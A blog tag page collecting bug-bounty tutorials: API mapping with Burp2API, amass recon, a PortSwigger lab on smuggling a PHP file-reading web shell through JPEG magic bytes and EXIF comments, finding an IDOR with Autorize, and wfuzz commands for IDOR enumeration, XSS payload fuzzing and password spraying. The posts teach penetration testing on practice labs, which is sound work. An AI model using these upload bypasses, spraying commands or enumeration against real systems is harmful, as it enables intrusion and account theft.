Tag: bug bounty

  • Reverse Engineering APIs with Burp2API

    Reverse Engineering APIs with Burp2API

    Postman is one of my favorite tools for testing the functionality and security of APIs. It allows you to organize API routes neatly and write/run automated tests across collections of requests.

    If you have access to the API spec of an application you are testing, you can easily import the mapped API directly into Postman in a structured fashion.

    But not all APIs have public spec files or even documentation. Sometimes, we have to fly a little blind.

    Well, not completely blind. We can use a proxy to capture the requests that form the API.

    The Process

There are many proxies to choose from, ranging from the CLI tool mitmproxy to the feature-packed hacking tool Burpsuite. It doesn’t matter which one you choose; they all serve the same purpose: capturing web traffic.

    The tricky part is getting that captured data into Postman in an organized fashion.

Postman does have a proxy built in, which, although convenient, doesn’t organize the routes the way importing an API spec would.

I used to use a technique I learned in APIsec University’s API Pentesting Course that involved using mitmproxy to capture the traffic, then mitmproxy2swagger to turn the captured data into an API spec.

    This worked well, but I’m not the biggest fan of mitmproxy. I like using Burpsuite to manage my testing and found myself flipping back and forth between them.

    I then stumbled upon this Burp extension that exported selected requests into a Postman collection format. But it didn’t do any formatting or structuring.

    There had to be a better way…

    Enter Burp2API

    Then, while I was thinking about developing my own tool, I stumbled upon this little gem: Burp2API. It’s a Python script that converts exported requests from Burpsuite into the OpenAPI spec format.

    My prayers had been answered!

    It’s basically mitmproxy2swagger but with the added benefit of not being dependent on mitmproxy.

    Why not just use mitmproxy?

    Don’t get me wrong, mitmproxy is a great tool, and I’m sure you CLI cronies out there swear by it. But there are numerous benefits to using Burpsuite over it.

    Firstly, it’s great for project management. You can specify a scope, make observations with Burp Organizer, and track any issues Burp automatically identifies.

    Secondly (and probably the most important), you have automated mapping capabilities. You can use Burp to scan and crawl to find endpoints you may miss by relying on manual browsing alone.

    Lastly, as a pentester, you will undoubtedly go back to Burp after your initial exploration phase. So, why not just stay there? That way, you can keep all of your gathered traffic in one place for more convenient analysis later.

    At the end of the day, we’re hackers. It makes sense to use the best tool for the job.

    I’m also big on simplicity. So, if I can get the same or better results using fewer tools, that’s a win for me. Plus, I’d rather be an expert with a few tools than skim the surface with many.

    Reverse Engineering crAPI

    For demonstration purposes, I’ll be using OWASP’s crAPI. crAPI is an intentionally vulnerable API. I love it because it’s built with a modern front end, making it feel more realistic.

    I highly recommend sharpening your skills with crAPI. As a realistic target, it allows you to practice the hacker mindset, rather than just regurgitating the exact steps you need to follow to solve a level in a CTF-like environment.

    So, let’s put our hacking caps on and dive in!

    Step 1: Manually gathering traffic

    The first step in our reverse engineering journey involves browsing the application as a normal user might. Nothing too glamorous.

    However, we’ll be running Burpsuite in the background so we can get a more in-depth look at how the application is working behind the scenes.

    I’m not going to go in-depth about how to set up Burp as a proxy, so here’s an article on that.

    The goal here is to cover every function of the app:

    • Signing in
    • Uploading profile pictures
    • Buying products
    • Commenting on posts
    • Resetting the account password

    Whatever the app allows us to do, we’re going to do.

    Remember, we’re not looking to break anything just yet, but don’t let that stop you from thinking about potential attack vectors while getting to know the app.

    Just by creating an account and signing into crAPI, I’m able to get an idea of how the API is structured:

    I’ve heard the argument that you should spend a ton of time getting to know the target application before you even fire up any hacking tools. While I partially agree with this sentiment, I believe that you should always have Burp running in the background as soon as you start browsing the app.

    You may capture requests or find some functionality that you would miss if you do a second pass with Burpsuite. Plus, Burpsuite passively scans captured traffic, so the more data, the better.

    Step 2: Discover more routes

    After exhausting manual exploration, it’s time to let Burp take the reins. There are a couple of ways that we can do this within Burp:

    1. Using a scan to crawl the application
    2. Using extensions

    Launching a scan with Burp

    To use Burp’s scanning capabilities, go to the Dashboard and click the New scan button:

    A window will pop up, asking us to choose a scan type. For our purposes (discovering more routes), I’ll select the Crawl option:

The other two options actively scan the target, which is noisier and takes longer. I highly recommend exploring those, but be aware that a WAF will most likely start blocking your traffic (or, more annoyingly, ban your IP) if you get too noisy.

    Next, add a list of URLs to scan.

I’m skipping the scan configuration and Resource pool sections for simplicity. So, the last item we’ll configure is the Application login section. I’ll add my login credentials here:

    This allows the crawler to use the specified credentials whenever it finds a login form. Burp will be able to travel deeper into the application this way.

    Without filling this out, it would just crawl the login page.

    Now, we’ll hit the “Scan” button and let Burp explore the app for us.

    Once the crawl finished, the summary page revealed that it found some new routes:

    Burp even handily adds these to our Sitemap for us. How cool!

    Using JSLinkFinder

    Burpsuite’s crawler is just one tool we can use to discover more endpoints.

    Instead of crawling the site, we can also parse the JavaScript for links using JSLinkFinder.

JSLinkFinder passively parses JS responses, so it most likely gathered links during the manual exploration phase. But, for demo purposes, I’ll show you how to trigger it in case it didn’t.

    In the Proxy’s History tab, select the JavaScript responses, right click them, then select Do a passive scan:

    We can see that JSLinkFinder found some links in the BurpJSLinkFinder tab:

    These will be automatically added to our sitemap. Unfortunately, since these are all out of scope, they won’t be of much use to us. But, it’s always good to explore options.

Now that we’ve collected routes manually and automatically, it’s on to phase 3!

    Step 3: Export the endpoints

    I like to use the Sitemap in the Target tab when exporting API requests. It gives me a structured look at the API.

    From the manual phase, we know that the crAPI API endpoints all contain api in the URL. We can filter the site map to get a more refined look at the API:

    Much better. This is exactly what I want to be reflected in Postman:

    To export the API routes, all we need to do now is right-click on the top-level URL and select Save selected items:

    Save the file in a convenient location.

Note: There is an option to encode the request/response data in base64. You can leave that on; Burp2API does the decoding for us.

    Now, we can leave Burp and head over to the command line.

    Step 4: Converting to API spec

    Finally, it’s time to use burp2api!

    It’s as easy as running the python script and supplying the file as an argument:

    $ burp2api.py crapi-api.req
    Output saved to output/crapi-api.req.json
    Modified XML saved to crapi-api.req_modified.xml

The output is saved in an output directory along with a second file. I copied the JSON file out of there and renamed it for convenience’s sake:

    cp output/crapi-api.req.json ../crapi-api-spec.json

    Now, we can upload it to the online swagger editor just like any old spec file:

    So simple and cool!

    Now it’s time to import this into Postman:

    Step 5: Importing to Postman

    Open up Postman in a fresh workspace. Then, click the Import button at the top.

    You can also just drag and drop the file anywhere in the window:

    When prompted, choose the option to import as OpenAPI 3.0:

    And finally, click Import.

    Now, you should have a beautifully organized mapping of the API in Postman:

    Why not just stay in Burpsuite?

    You may be wondering why we went through the effort of migrating to Postman when we had all the data we needed in Burp structured exactly the way we wanted.

    Ok, you might not have, but I’ll explain the method to my madness anyways.

    This method of reverse engineering is great for when you are running continuous, structured security tests on a single API.

    For example, at my job, the application I am testing makes use of an internal API. This API doesn’t have documentation or a spec file, so I would need to reverse engineer it to get the structure mapped out.

    As a Quality Engineer, I need to continuously test the API to make sure that changes don’t introduce bugs or security flaws during each development cycle. Postman is great for automating this process as I can write automated tests, then run them on a nightly basis using a cron-job to ensure stability.
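For the curious, here’s a rough sketch of what that nightly run could look like using newman, Postman’s CLI collection runner. The collection path and the 2 AM schedule below are placeholders, not details from this post:

# Crontab entry: run the exported collection every night at 2 AM
# (install newman first with: npm install -g newman)
0 2 * * * newman run /path/to/api-tests.postman_collection.json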

    If you’re a pentester or bug bounty hunter, it may be more worth your time to just stay in Burp as you’re not likely going to be monitoring the API for the long-term.

    In short, make sure you understand the context of your testing and choose what works best for you.

    Conclusion

    I hope you gained something from reading this!

    This is typically the method I use for mapping as well as reverse-engineering APIs. So, you kind of got a two-for-one deal in this post!

    I personally like this better than the mitmproxy -> mitmproxy2swagger approach. It’s simpler and removes my dependency on mitmproxy. Fewer tools, yay!

    Please try this out for yourself against crAPI. Reading this post once and forgetting about it isn’t going to make you a better tester.

    So, practice, practice, PRACTICE!

    I also recommend you read Portswigger’s documentation on Burpsuite (even if you’re already familiar with the tool). The part walking through the pentest workflow using Burpsuite is highly valuable.

    Also, explore the courses in APISec University if you’re new or even an intermediate web/API hacker.

    Both of these resources are FREE so take advantage of them.

    I wish you the best on your security journey! Keep learning!

  • Practical amass – How I configure and use amass in my recon flow

    Practical amass – How I configure and use amass in my recon flow

    If you’re into recon, you’ve probably heard of amass. It’s a powerful tool for mapping attack surfaces during bug bounty hunting or penetration testing. Here’s why I love it:

    • It’s close to an all-in-one recon tool.
    • It aggregates data from multiple resources (DNS, ASN, Whois, etc.).
    • Its capabilities can be extended with API keys.
    • It stores all data in a SQLite database, making information management and querying easier than relying on text files.

    Instead of repeating what’s already in the official tutorial, I’ll take you through how I use Amass in my bug bounty recon workflow.

    Global Configuration

    Once you install amass, the first step is setting up its configuration files. For me, these live in:

    ~/.config/amass/

Then, inside this directory, I did the following:

    1. Create the Required Files:

    1. datasources.yaml: Stores API keys.
    2. config.yaml: Default configuration file.

    2. Set Up Datasources

    Run the following to see which sources need configuring:

     amass enum -list

    Any source marked with a star requires an API key. Register for as many free resources as possible to maximize Amass’s capabilities. For example, my datasources.yaml file contains:

    datasources:
      - name: Shodan
        creds:
          account:
            apikey: "<key>"
      - name: VirusTotal
        creds:
          account:
            apikey: "<key>"
      - name: SecurityTrails
        creds:
          account:
            apikey: "<key>"
    global_options:
      minimum_ttl: 1440

    3. Link Datasources to the Configuration

    Use config.yaml to reference your datasources file:

    options:
      datasources: <PATH TO>/.config/amass/datasources.yaml

    For a basic setup, this configuration is enough. You can explore more customization options in the OWASP Amass project.

    Workspace Setup

    Before I start working on a program, I create a directory for all of my program-specific work:

    ~/bounties/<program-name>/recon/amass

    This is where I would store amass outputs, configuration files, and databases.

    Project-Specific Configuration

    In the amass directory, I maintain a separate config.yaml tailored to the specific program:

    scope:
      domains:
        - example.com
        - example1.com
      ips:
        - 127.0.0.1
      asns:
        - 1234
      blacklist:
        - sensitive.example.com
    options:
      timeout: 5
    

    This keeps Amass focused on the program’s defined scope and prevents unnecessary noise. You can point amass to this project-specific configuration file with the -config flag.

    Root Domain Discovery

    If you’re starting with ASNs, IP ranges, or an organization’s name, the intel command helps find root domains to target:

    amass intel -asn 16839 -dir amass -config recon/config.yaml

    Or, if you already have a domain and want to expand the attack surface:

    amass intel -whois -d example.com -dir amass -config recon/config.yaml

    This performs a reverse whois lookup, gathering related domains.

    Subdomain Discovery

    Once you’ve identified root domains, it’s time to dig deeper with enum:

    amass enum -d example.com -dir amass -config recon/config.yaml

    This will map out subdomains for further analysis.

By default, amass enum runs passively, meaning it relies solely on third parties for its information. You can use the -active flag to tell it to interact directly with the target for (potentially) more results and increased accuracy:

    amass enum -active -d example.com -dir amass -config recon/config.yaml

    This will likely take longer to run than the passive option. I recommend starting with passive then circling back to active once you’ve exhausted your exploitation efforts.

It’s also worth noting that amass has capabilities for performing subdomain brute-forcing, including a useful hashcat-like masking option. I’ll leave that for you to explore in the official tutorial.

    Parsing Gathered Domains

    amass organizes all data in a SQLite database stored in the directory specified by the -dir flag. Using sqlite3, you can query and manage the data:

    $ sqlite3 amass.sqlite
    sqlite> .tables
    assets           gorp_migrations  relations
    

    The assets table is the most relevant, categorizing data into types like FQDN, IPAddress, ASN, and more.

    An example query to extract recent IPv4 addresses:

    SELECT content -> 'address'
    FROM assets 
    WHERE type = 'IPAddress' 
    AND json_extract(content, '$.type') = 'IPv4' 
    ORDER BY last_seen DESC 
    LIMIT 10;
    

As you can see, using SQLite as the database makes it easy to pull exactly what you need and plug it into other tools.

    Why SQLite Beats Legacy Features

    Older versions of Amass supported amass db for queries and amass viz for visualization. While those features were neat, I prefer direct database queries. They give you more control and are easy to script for repeated workflows.

    For example, you could write a script to export all gathered domains and IPs into separate files for further analysis.
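Here’s a minimal sketch of such a script. It assumes the amass.sqlite file from above is in the current directory and that FQDN assets store the hostname under a name key (IPAddress assets use address, as in the earlier query); the ->> operator needs SQLite 3.38 or newer:

#!/usr/bin/env bash
# Dump every gathered domain and IP into flat files for other tools
sqlite3 amass.sqlite "SELECT content ->> 'name' FROM assets WHERE type = 'FQDN';" \
  | sort -u > domains.txt
sqlite3 amass.sqlite "SELECT content ->> 'address' FROM assets WHERE type = 'IPAddress';" \
  | sort -u > ips.txt
wc -l domains.txt ips.txt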

    Also, the viz feature doesn’t add much value in my opinion. For me, visualizing massive amounts of data would be more overwhelming than useful.

    I’d much rather pull only what stands out to me and throw it in a mind-mapping tool (like xmind). That way, I can work in a less cluttered environment.

    Conclusion

    amass is a game-changer for recon workflows. While setting up API keys may cost some time (and occasionally money), it’s an investment that will give you an edge in bug bounty programs.

    I highly encourage you to experiment with this tool, tweak configurations, and build scripts to fit your needs.

    Happy hunting!

  • Remote code execution via polyglot web shell upload – Portswigger Web Security Academy Lab Walkthrough

    Remote code execution via polyglot web shell upload – Portswigger Web Security Academy Lab Walkthrough

    In this lab, we will bypass simple file validation to upload PHP code. I found this lab particularly interesting because the bypass involved injecting code into an image’s metadata. This is a technique I was unfamiliar with before attempting to solve this lab and I thought it was pretty cool. So, let’s get into my thought process for solving this lab!

    The task at hand

    The description of the lab is as follows:

“This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter”

    In the directions, we’re given the hint that the code validates an image based on its contents. The first thing that came to mind was changing the magic bytes of my PHP web shell to pass it off as an image. So, I set out to do just that!

    Magic Bytes

    Magic Bytes are file signatures used to identify files. They are used in UNIX-based operating systems to distinguish different file types from each other. Operating systems need to know this because different file types need to be handled differently. For example, an image file must be treated differently than an executable file. Windows, on the other hand, relies on file extension names instead.

    So, if the server that is doing the file validation is running Linux, we might be able to trick it into thinking that our PHP file is an image by changing the leading bytes.

    Let’s craft the payload!

    Since we’re given the directory of the secret, my PHP code just outputs the file’s contents to the browser. For convenience’s sake, it’s not a full-blown web shell:

    <?php
    $file = '/home/carlos/secret';
    $contents = file_get_contents($file);
    echo $contents;
    ?>

    I have it saved as webshell.php (super low profile). Using the file command in my terminal, we can see that it gets recognized as a text file with PHP code written in it:

    Even after we change the extension, it’s still recognized as a PHP script. Magic Bytes!

    Let’s see what happens when we change the leading bytes of the file to the file signature of a JPEG.

    First, let’s use xxd to see what the original bytes look like:

    For this to be recognized as a JPEG, we’ll have to change the leading bytes to FF D8 FF E0. I got that magic number from this wiki article.

    To edit the file, I’m going to use a tool called hexedit. Before editing, I’ll add a few new lines to preserve the original code (4 to be exact because the signature is 4 bytes):

    Now, after saving, the file should be recognized as a JPEG:

    Just like magic!
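If hexedit feels clunky, the same result can be had from the shell by prepending the signature instead of overwriting the padding bytes (webshell.php and webshell.jpg are just the example filenames from above):

# Stick the 4-byte JPEG signature in front of the PHP file
printf '\xFF\xD8\xFF\xE0' | cat - webshell.php > webshell.jpg

# file should now report it as JPEG image data
file webshell.jpg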

    Logging into our lab’s account with wiener:peter, we are met with an option to upload an avatar image. Proxying my traffic with Burp, I try to upload the web shell:

No dice! Looks like the file checker doesn’t just check the file’s signature…

    Enter EXIF!

    We need to find another way to pass our PHP code off as an image file. My second thought was to somehow inject the PHP code into a valid image instead of trying to make my PHP file mimic an image.

A quick Google search on “injecting PHP code into an image” led me to this excellent article. Apparently, code written into the metadata of an image can be executed!

    If you don’t know what EXIF data is, it’s basically metadata, or extra data written to an image to provide information about the context of the image. This can include the device used to snap the photo, the resolution, and even more revealing information like the location the image was taken.

    For this reason, examining EXIF data is a powerful recon technique. Let’s take a look at an example of a random picture I downloaded online:

    This information is not only readable but writeable as well.

    We can add comments in the metadata with a tool called jhead. Using the command jhead -ce <image>, we can edit the EXIF comment field:

Saving this, the comment section of the metadata now stores our PHP code:
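If you’d rather skip the interactive editor, jhead also has a -cl option that writes the comment in one shot. The image name and the condensed one-line payload below are just examples:

# Write a condensed version of the earlier PHP straight into the EXIF comment
jhead -cl "<?php echo file_get_contents('/home/carlos/secret'); ?>" avatar.jpg

# Print the EXIF data again to confirm the comment landed
jhead avatar.jpg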

    This has no impact on the integrity of the file and will bypass most image upload checks:

    The only caveat is that most servers aren’t configured to execute image files (makes sense). So, in order for the code to run, we’ll have to change the filename to have a .php extension.

    Success!

    Inspecting the uploaded image with dev tools tells us where the file was uploaded to:

    Browsing to this location gives us the secret! Of course, I’m not going to show this to you. You’ll have to take my word for it and solve the lab on your own 😉

    Conclusion

    Solving this lab helped me to learn a powerful code smuggling technique. This method should be flexible and open a world of possibilities for you. I can only imagine trying this with other languages like Javascript for stored XSS.

    Of course, this would only work if the server doesn’t validate files based on their extension. There are workarounds to bypass this even in the event that the server does make this check (like exploiting a race condition) so it is up to you to get creative with this and find some critical bugs.

    Anyways, thanks for reading! I hope you learned something because I certainly have! Until next time 🙂

  • Make access control bug discovery fast and easy with Autorize

    Make access control bug discovery fast and easy with Autorize

    We’re back from our slight detour to swing back into web app testing! Don’t worry though, I haven’t given up on wireless stuff. More content for that coming soon!

    In this post, I’m going to walk through a demo that makes use of my favorite Burpsuite extension: Autorize. Autorize is a plugin that makes testing for access control vulnerabilities easy. You can just let it run in the background as you peruse the web app you’re testing and it will tell you what can be bypassed automagically!

    So, let’s jump right into the demo.

    Installing Autorize

Autorize doesn’t come with Burp by default. To use its magical powers, we’re going to have to install it ourselves. Luckily, Burpsuite makes this super easy for us by hosting it on the BApp Store. You can find the BApp Store under the Extensions tab. Then a simple search for “Autorize” will pull it right up for you:

Then just click the orange “Install” button to install it. My button says “Reinstall” because I already have it all set up.

    If you have a greyed out button, you’ll need to install and configure Jython because Burpsuite is a Java tool and Autorize is written in Python. To do that, you can download the Jython standalone here. Then, just go to the “Extensions settings” under the “Extensions” tab and add the location of your Jython standalone JAR file like so:

    And now you should be able to run Autorize!

    Demo Time

    For demonstration purposes, I’m going to be testing an instance of OWASP Juiceshop running locally. If you haven’t heard of it, Juiceshop is a web app built with modern web technologies designed to be intentionally vulnerable so that you can practice what you’ve learned. It also has a ton of guided walk-throughs so I highly recommend trying it out if you want to get into web penetration testing.

    Ok, let’s get started. To run Autorize, we’re going to have to be running Burpsuite and have it proxy our web traffic (no surprise there). For Autorize to be able to auto-magically test for Authorization bugs, it needs whatever headers the web app uses for authentication.

I went ahead and created two accounts for testing: sambamsam1@gmail.com and sambamsam2@gmail.com. To start, I’ll log in with sambamsam1 and grab the header I need to copy over to Autorize:

OWASP Juice Shop uses bearer tokens to authenticate, so I copied the entire Authorization header. Then, over in the new Autorize tab, you can just paste it in:

    And that’s all you need to set up Autorize. Pretty simple really. I like to add some filters to the list to make things easier for me. One of the filters I set up on every run is the “Scope items only” filter. This is essential if you’re testing on a Bug Bounty Program.

    Additionally, I like to add a “URL contains” filter (you can select them from the drop down then add content if needed), if I’m targeting a specific domain or endpoint. If I’m testing an API that makes excessive use of OPTIONS requests, there’s an option to filter those out too.

Once you’ve got that all set up, log out and log back in as another user (in my case, sambamsam2) and you’re good to go! Click the “Autorize is off” button at the top and it will turn bright blue to indicate that everything is running.

    Now, all you have to do is browse the application like a user normally would. In this example, I added an item to my shopping cart as my sambamsam2 user.

    Popping back over to the Autorize tab, you’ll see a ton of requests pile up:

The two columns with all the colors tell us whether authorization was bypassed using the modified header (our other user’s token) or with no authentication at all. A lot of these requests aren’t of any interest to us. However, request 4 stood out to me because it had a simple numerical ID associated with it and appeared to be accessible by our other user.

    We can right-click the request and send it to the Repeater (or Ctrl+R) for a closer look.

In the Repeater tab, we can verify that the request still succeeds when sent with the authorization token of our other, logged-out user:

And it looks like any logged-in user can access other users’ shopping carts just by adding the correct ID to the URL. This vulnerability is known as an Insecure Direct Object Reference (IDOR), and its severity can vary depending on the predictability of the ID and the confidentiality of the data. In our case, the items in a user’s shopping cart aren’t as revealing as an address or social security number, but a single-digit numeric ID can be easily guessed, making this a medium-severity bug.

I used jwt_tool in my terminal window to verify that the JWT in the request belonged to my other user, sambamsam1. jwt_tool is great for conveniently dissecting JWTs, but it can also be used for exploiting the technology behind them. Maybe I’ll have to do a tutorial on that…
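For reference, the check itself is a one-liner; the token below is a truncated placeholder, so paste in the full value from the captured Authorization header:

# Decode the captured JWT and look for the owner's email in the payload
python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOi...<rest of token>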

Conclusion

As you can hopefully see, Autorize makes testing for access control vulnerabilities extremely easy. With Autorize, all you have to do is casually browse the application while it runs in the background.

    I used to have to go back and copy headers to every request I thought was interesting and resend the request every time I wanted to verify an IDOR or some other similar vulnerability. Now I can let it run while I explore or do other testing. Just don’t forget to check back every once in a while or you’ll have tons of requests to dig through.

Autorize helped me find my first paid bug, which chained a privilege escalation with IDORs. I found a JWT that seemed to belong to an admin user and used Autorize to see what it gave me access to.

    Hope you add this tool to your arsenal and it helps you as much as I do! Stay tuned for more hacking tutorials coming soon!

  • Harnessing the power of wfuzz for web hacking

    Harnessing the power of wfuzz for web hacking

In today’s post, I’ll introduce you to a tool that should be a part of every bug hunter’s toolkit: wfuzz! I use wfuzz in every bug bounty program I participate in. If you don’t know what wfuzz is, it’s a web application fuzzer. And if you haven’t heard of web application fuzzers, they’re tools that automate web requests.

As you’ll see in this post, fuzzers are a simple yet extremely powerful type of tool, and by the end of this read you’ll be able to confidently use wfuzz, one of the best in the game!

    Practical Examples

    Instead of teaching you the syntax, I’m going to run you through a series of hypothetical, real-world examples so you can use it in your next pentest or bug hunt.

    For simplicity, I’m going to use a popular repository of wordlists called SecLists. These wordlists were put together by a few well-known security professionals including Daniel Miessler and Jason Haddix. I highly recommend you check out the repo and get familiar with what’s in some of the lists.

    Directory Discovery

    Discovering hidden files or directories of a web application can be a gold mine for security testers. wfuzz makes this a snap by fuzzing the target url:

    wfuzz -c -w raft-small-directories-lowercase.txt -u "https://example.com/FUZZ"

    Let’s break this down:

    • -c, colored output to make output easier to read
    • -w, the specified wordlist
    • -u, the url to fuzz

You might have noticed the word FUZZ in the URL. This is the keyword that tells wfuzz where to fuzz, i.e. where to substitute each line from the wordlist.

    In this example, the output would look something like this:

    ********************************************************
    * Wfuzz 2.4.5 - The Web Fuzzer                         *
    ********************************************************
    
    Target: https://example.com/FUZZ
    Total requests: 20116
    
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload
    ===================================================================
    
    000000007:   404        0 L      0 W      0 Ch        "cache"
    000000008:   200        0 L      0 W      0 Ch        "media"
    000000009:   404        0 L      0 W      0 Ch        "js"
    000000001:   200        0 L      0 W      0 Ch        "cgi-bin"
    000000002:   404        0 L      0 W      0 Ch        "images"
    ...

    As you can see, wfuzz neatly prints out the response code, payload used, as well as the number of lines, words, and characters in the response.

    To make the output a little cleaner, I can filter it based on any of the response attributes, like status code:

    $ wfuzz -c -w raft-small-directories-lowercase.txt -u "https://example.com/FUZZ" --sc 200
    
    ...
    
    000000008:   200        0 L      0 W      0 Ch        "media"
    000000001:   200        0 L      0 W      0 Ch        "cgi-bin"
    ...

Now all that is shown are responses with status code 200. We can also use --sl, --sw, --sh, or --ss to show only responses with a specific number of lines, words, or characters, or whose content matches a specific regex, respectively.

Alternatively, you can swap the s prefix for an h (--hc, --hl, and so on) to hide matches rather than show them.
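For example, hiding 404s often cleans up the output just as well as whitelisting 200s:

wfuzz -c -w raft-small-directories-lowercase.txt -u "https://example.com/FUZZ" --hc 404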

    This one-liner can lead to some big finds, including configuration files, admin logins, and much more depending on the wordlist.

    Wordlist Contexts

A little bit of recon with a tool like wappalyzer can go a long way. Knowing which Content Management System is in use (think WordPress or Drupal), where API endpoints live, and so on can lead to more findings.

    For example, if I knew my target was running on top of an Nginx server, I might use a wordlist catered towards default files and directories:

    wfuzz -c -w nginx.txt -u "https://example.com/FUZZ" --sc 200,403

    If you uncovered an API endpoint, you can use a wordlist of common object names (like user, team, admin, etc.):

    wfuzz -c -w /api/objects.txt -u "https://api.example.com/v2/FUZZ" --hl 4037

Using a wordlist that is right for the situation makes it more likely that you’ll find something interesting. Don’t just blindly use random wordlists; there’s no one wordlist to rule them all!

    Subdomain Bruteforcing

    Finding subdomains is key to expanding your attack surface. More often than not, the most interesting subdomains aren’t found passively.

    wfuzz can fuzz anywhere the FUZZ keyword is located in a request, including in headers.

    To bruteforce subdomains with wfuzz, fuzz in the Host header:

    wfuzz -c -w /Discovery/DNS/deepmagic.com-prefixes-top500.txt -H "Host: FUZZ.example.com" -u "https://example.com"

    While wfuzz is capable, sometimes using a tool that is specifically built for this (like gobuster or amass) might be easier and yield better results.

    IDOR

    wfuzz offers a variety of payloads that can be used to fuzz with, including a list of numbers.

If I stumbled upon an id parameter in a JSON body that used a guessable four-digit number, I might fuzz it like so to see if I can access any accounts I don’t own:

    wfuzz -c -z range,0000-9999 -X POST -H "Content-type: application/json" "https://example.com/myaccount" -d '{"id": "FUZZ"}'

The -z parameter is used to specify a payload type and its options. You can see the full list of payloads with wfuzz -e payloads.

You might also notice that I changed the method from the default GET to POST with the -X option and added a body to my request with -d. This syntax should be familiar to you if you’ve ever used curl before. Another reason why I love wfuzz!

    Injection

    If you’ve ever tested for injection vulnerabilities (like SQLi or command injection) then it is likely that your attempts have been blocked by a WAF (Web Application Firewall). WAFs are all fine and dandy but they’re not perfect.

It can be useful to fuzz common payloads to see if any might slip through the cracks:

    wfuzz -c -w Fuzzing/XSS/XSS-Somdev.txt -u "https://example.com?q=FUZZ" --hc 403

    In this example, I used a Cross-site Scripting (XSS) wordlist to see if any common payloads weren’t blocked. This likely will not lead to a XSS bug right away, but might clue me in on what keywords or encoding methods might allow me to build a working payload.

    If you’re into finding XSS bugs, fuzzing with Portswigger’s XSS Cheat Sheet can help you see what HTML tags and events are permitted so you can get an idea of how to build your own payload.

    Password Spraying

    Database leaks for a specific target can be a great asset when testing login pages, but with thousands of accounts to choose from, it can be hard to find valid credentials. Luckily, wfuzz can do this much faster than we can.

    Password spraying is the act of guessing the password of many different accounts (not just one like in brute-force attacks). To achieve this, you need to tell wfuzz to fuzz in two separate locations each with its own payload like so:

    wfuzz -c -m zip -w users.txt -w passwords.txt -X POST -u "https://example.com" -d "username=FUZZ&password=FUZ2Z" --sc 302

    For fuzzing multiple locations with different payloads, you need to supply FUZ<payload #>Z. In this example FUZZ is associated with users.txt and FUZ2Z with passwords.txt.

I also supplied an iterator type of zip with the -m argument. The zip iterator matches each payload to the other 1-to-1, so it is perfect for password spraying. If you’ve used Burp’s Intruder before, the zip iterator is just like Intruder’s Pitchfork attack type.

We can list the other iterator types with wfuzz -e iterators, just like we did for payloads.

    Wrapping it all up

wfuzz does one thing (and only one thing) well: spit out a bunch of requests really fast. It’s up to you to make it an effective hacking tool.

That means choosing the right wordlist for the job. There are tons of wordlists out there for different jobs. Don’t just limit yourself to SecLists. It’s a great collection and popular for a reason, but its popularity means that a lot of other hunters are going to be using it too, so you’ll likely stumble across the same bugs they do.

    So, Google around and find wordlists that work for you. Or, better yet, make your own as you hunt!

    Also don’t go fuzzing around unless the program allows it. Sometimes there’s a request delay requirement and other times companies won’t permit the use of automated tools at all. Read the policy carefully! Otherwise, you may end up overwhelming the company’s servers.

    Now, you have most of what you need to unleash the power of wfuzz and hunt more efficiently! Happy hunting!

  • Unveiling my Methodology for Exciting Bug Discoveries and Optimal Results

    Unveiling my Methodology for Exciting Bug Discoveries and Optimal Results

    When I first started getting into bug hunting, I tried to create the perfect methodology by mimicking what the greats were doing. I wanted to do recon and automation like Jason Haddix and become a command line guru like Tom Hudson.

It was fun learning how to use tons of tools, but I quickly became bored. I spent more time waiting for tools to finish running and scrolling through text files containing hundreds of URLs than I did hacking. Then there was the issue of organizing the overwhelming amount of information I had gathered. Bug hunting began to feel less fun and more like a chore. I began to get discouraged and doubt that cybersecurity was the right field for me.

    Switching it up

    One day, while I was waiting for amass to wrap up finding everything it could on a program with a massive scope, I decided to poke around on Google to see what I could dig up.

    Right away, I found interesting login pages and older looking pages and began focusing my attention on those. Before I knew it, I was on the path to finding bugs before my scan even finished running! Not only did I find bugs faster this way but I was having fun doing it.

    It finally dawned on me: I wasn’t losing interest in cybersecurity–I was just doing it wrong!

    Keeping it casual

    Through my experience, I realized that I wasn’t a fan of using tools, taking extensive notes, or organizing scans. I loved exploring web applications and noting what I thought was interesting. As a result, my bug hunting methodology reflected just that.

    Recon

    I have the most fun interacting with websites in a more visual manner than what text-based tools have to offer. So, my weapon of choice is Google.

    Google offers a variety of advanced queries that can be used to map web applications and find juicy areas that aren’t regularly found with normal searches. For example, I usually start my recon by finding subdomains with this simple Google dork:

    site:example.com

    Right off the bat, I’ll have some links I can explore to get a feel for what kind of organization I’m dealing with. For more dorks, check out my post about this interesting subject.
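A few other dorks I reach for constantly (example.com stands in for the target): the first drops the main site, the second hunts for login pages, and the third digs up documents that occasionally leak internal details:

site:example.com -www
site:example.com inurl:login
site:example.com filetype:pdf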

    I also like to use other search engines like crt.sh or shodan for more technical detail.

    This method makes recon much more fun for me. I’m almost like a kid in a toy store perusing around endless aisles of fun!

    If I exhaust my Google searches, I’ll try subdomain brute-forcing using wordlists refined with the information I gathered previously. For example, if I stumbled upon some dev or test domains, I may try those domains or similar permutations on other (sub)domains I’ve found. Similarly, I’ll fuzz for hidden directories. Lately, my tools of choice have been gobuster and wfuzz.
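As a rough sketch (example.com, dev.example.com, and the wordlist names are placeholders), that usually looks something like this:

# Subdomain brute-forcing with gobuster
gobuster dns -d example.com -w subdomains.txt

# Directory fuzzing with wfuzz, hiding 404s and 403s
wfuzz -c -w raft-medium-directories.txt -u "https://dev.example.com/FUZZ" --hc 404,403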

    Exploitation

    Once I’ve narrowed down what area of the scope I want to test, I’ll start manually interacting with it.

    Usually, I’ll use mitmproxy to do this. For a command line tool, it has a great interface. Plus, I can save everything I captured to go back to later (can’t do that with Burpsuite Community Edition).

    Whatever I want to test, I can forward over to Burpsuite. I frequently use the Repeater to test requests.

As you can see, my tool-set is pretty simple. All I need is a proxy (mitmproxy and Burpsuite) and a fuzzer (gobuster and wfuzz). The reason I keep my toolkit relatively small is that tools and vulnerabilities are constantly changing and evolving. There are tons of tools out there just for testing XSS, and new bypasses are being developed every day. So, whenever I come across something I want to test, I look up how people are currently breaking it, because defense is always evolving.

    This also keeps me from being overwhelmed with having too many tools. It’s hard to keep track of which tools to use when and how. I’m also not overly concerned with brushing up on web app hacking because I learn as I hunt for bugs this way.

